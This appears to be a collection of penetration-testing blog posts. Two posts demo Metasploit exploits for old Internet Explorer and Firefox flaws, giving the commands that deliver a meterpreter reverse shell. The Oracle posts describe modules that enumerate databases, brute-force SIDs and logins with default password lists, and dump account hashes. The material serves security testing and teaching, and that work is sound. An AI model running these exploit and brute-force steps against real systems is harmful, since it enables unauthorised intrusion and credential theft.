MS10-026 : Microsoft MPEG Layer-3 Audio Stack Based Overflow Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability discovered by Yamata Li and submitted to Microsoft
Coordinated public release of the vulnerability the 2010-04-13
Metasploit PoC provided the 2011-08-12

PoC provided by :

Yamata Li
Shahin Ramezany
juan vazquez
Jordi Sanchez

Reference(s) :

CVE-2010-0480
OSVDB-63749
MS10-026 (KB977816)

Affected version(s) :

Microsoft Windows 2000 SP4
Windows XP SP2 and SP3
Windows XP Professional x64 SP2
Windows Server 2003 SP2
Windows Server 2003 x64 SP2
Windows Vista, Windows Vista SP1, and Windows Vista SP2
Windows Vista x64, Windows Vista x64 SP1, and Windows Vista x64 SP2
Windows Server 2008 32 and Windows Server 2008 32 SP2
Windows Server 2008 x64 and Windows Server 2008 x64 SP2

Tested on Windows XP SP3 with :

Internet Explorer 6

Description :

This module exploits a buffer overlow in l3codecx.ax while processing a AVI files with MPEG Layer-3 audio contents. The overflow only allows to overwrite with 0’s so the three least significant bytes of EIP saved on stack are overwritten and shellcode is mapped using the .NET DLL memory technique pioneered by Alexander Sotirov and Mark Dowd. Please note on IE 8 targets, your malicious URL must be a trusted site in order to load the .Net control.

Commands :

use exploit/windows/browser/ms10_026_avi_nsamplespersec
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
getuid
sysinfo
ipconfig

Metasploit Oracle database enumeration (oraenum)

Metasploit,

Metasploit provide one useful and additional Oracle database auxiliary module who will permit you to gather informations.

You can find all these auxiliary modules through the Metasploit search command.

To invoke this auxiliary module just type the following command :

This module will scan the Oracle database server to gather different informations :

  • Oracle version (select * from v$version)
  • All values from v$parameter (select name,value from v$parameter)
  • If database audit trail is enabled or not
  • If database sys operations audit is enabled or not
  • If SQL92 security restriction on SELECT is enabled or not
  • If link encryption for logins is enabled or not
  • Provide you the UTL directory access configuration
  • Provide you the audit log directory configuration
  • Provide you the current account lockout time from the password policy
  • Provide you the number of authorized failed logins value before an account is locked from the password policy
  • Provide you the password grace time value from the password policy
  • Provide you the password lifetime value from the password policy
  • Provide you the the number of times a password can be reused from the password policy
  • Provide you the maximun number of times a password needs to be changed before it can be reused from the password policy
  • Check if the password complexity is enabled or not
  • Provide you a list of all active accounts in format Username, Hash and Spare4
  • Provide you a list of all expired or locked accounts in format Username, Hash and Spare4
  • Provide you a list of all accounts with DBA privileges in format Username and Hash
  • Provide you a list of all accounts with ALTER, JAVA ADMIN, CREATE LIBRARY, CREATE ANY.
  • Check default password are setup on the database.

CVE-2011-0065 : Mozilla Firefox mChannel use after free vulnerability Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability discovered by regenrecht and submitted to ZDI
Initial ZDI vulnerability notification to vendor the 2011-02-17
Coordinated public release of the vulnerability the 2011-04-28
Metasploit PoC provided the 2011-08-10

PoC provided by :

regenrecht
Rh0

Reference(s) :

CVE-2011-0065
OSVDB-72085
ZDI-11-158
MFSA-2011-13

Affected version(s) :

Firefox 3.6.17 and bellow
Firefox 3.5.19 and bellow
Seamonkey 2.0.14 and bellow

Tested on Windows XP SP3 with :

Mozilla Firefox 3.6.16

Description :

This module exploits an use after free vulnerability in Mozilla Firefox 3.6.16. An OBJECT Element mChannel can be freed via the OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel becomes a dangling pointer and can be reused when setting the OBJECTs data attribute. (Discovered by regenrecht). This module uses heapspray with a minimal ROP chain to bypass DEP on Windows XP SP3.

Commands :

use exploit/windows/browser/mozilla_mchannel
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
getuid
sysinfo
ipconfig

Metasploit Oracle Database Auxiliary Modules

Metasploit

Metasploit provide some Oracle database auxiliary modules who will permit you to brute force SID’s, do brute force login and execute SQL queries.

You can find all these auxiliary modules through the Metasploit search command.

Oracle TNS Listener SID enumeration scanner (sid_enum)

To invoke this auxiliary module just type the following command :

This module attempt to discover running Oracle TNS Listener and the associated SID. For Oracle database above 9.2.0.8 the listener is protected and the SID will have to be brute forced. You can run this module against multiple hosts by defining the “RHOSTS” variable. “RHOSTS” variable could be an unique IP address, an IP addresses range (ex : 192.168.1.0-192.168.1.255, or 192.168.1.0/24) or a file (file:/tmp/ip_addresses.txt). Also in order to parallelize brute force attempts, just increase the number of concurrent threads by setting the “THREADS” variable.

Oracle TNS Listener version scanner (tnslsnr_version)

To invoke this auxiliary module just type the following command :

This module attempt to discover running Oracle TNS Listener and they’re versions. You can run this module against multiple hosts by defining the “RHOSTS” variable. “RHOSTS” variable could be an unique IP address, an IP addresses range or a file. Also in order to parallelize brute force attempts, just increase the number of concurrent threads by setting the “THREADS” variable.

Oracle TNS Listener information gathering (tnscmd)

To invoke this auxiliary module just type the following command :

This module will send TNS commands in order to gather informations. You can run this module against multiple hosts by defining the “RHOSTS” variable. “RHOSTS” variable could be an unique IP address, an IP addresses range or a file. Also in order to parallelize brute force attempts, just increase the number of concurrent threads by setting the “THREADS” variable.

Oracle TNS Listener SID brute force – admin module (sid_brute)

To invoke this auxiliary module just type the following command :

This module attempt to discover running Oracle database SID’s. Just provide the target address range to the “RHOST” variable. “RHOST” variable should be an unique IP address. You can specify the amount of seconds between each request by the “SLEEP” variable. Metasploit provide a common SID list file located in “/opt/metasploit3/msf3/data/wordlists/sid.txt“.

Oracle TNS Listener SID brute force – scanner module (sid_brute)

To invoke this auxiliary module just type the following command :

This module provide you the same as result as the “sid_brute” admin module, but you have more module definition options and outputs. You can run this module against multiple hosts by defining the “RHOSTS” variable. “RHOSTS” variable could be an unique IP address, an IP addresses range or a file. Metasploit provide a common SID list file located in “/opt/metasploit3/msf3/data/wordlists/sid.txt“. Also in order to parallelize brute force attempts, just increase the number of concurrent threads by setting the “THREADS” variable.

Oracle authentication brute force login – admin module (oracle_login)

To invoke this auxiliary module just type the following command :

This module attempts to authenticate against an Oracle database using username and password combinations indicated by the “CSVFILE“. Metasploit provide a common login and password file in “/opt/metasploit3/msf3/data/wordlists/oracle_default_passwords.csv“. Provide the target address range to the “RHOST” variable. “RHOST” variable should be a an unique IP address.

Oracle authentication brute force login – scanner module (oracle_login)

To invoke this auxiliary module just type the following command :

First of all this module require that you have Nmap >= 5.50 installed on your Metasploit station. This module provide you the same as result as the “oracle_login” admin module, but you have more module definition options and outputs. You can run this module against multiple hosts by defining the “RHOSTS” variable. “RHOSTS” variable could be an unique IP address, an IP addresses range or a file. This module is also attempting to authenticate against the Oracle instance using username and password combinations indicated by the “USER_FILE“, “PASS_FILE“, and “USERPASS_FILE” options. Metasploit provide a default “USERPASS_FILE“ located in “/opt/metasploit3/msf3/data/wordlists/oracle_default_userpass.txt” . You can use SkullSecurity password lists, or my own list how is updated regularly. Also in order to parallelize brute force attempts, just increase the number of concurrent threads by setting the “THREADS” variable.  Take care to don’t forget to configure the “RPORTS” variable to “1521” for example.

All valid user and password combinations are in green, but you will also see valid accounts how are locked.

Oracle generic SQL query execution (oracle_sql)

To invoke this auxiliary module just type the following command :

This module attempts to execute an SQL query against the Oracle instance. The default SQL query will check the running version of Oracle database. You will require valid SID, login and password previously discovered with the “sid_brute” and “oracle_login” auxiliary modules. Provide the target serveur to the “RHOST” variable. “RHOST” variable should be an unique IP address.

Some useful SQL Oracle queries for pen testing are available on pentestmonkey website.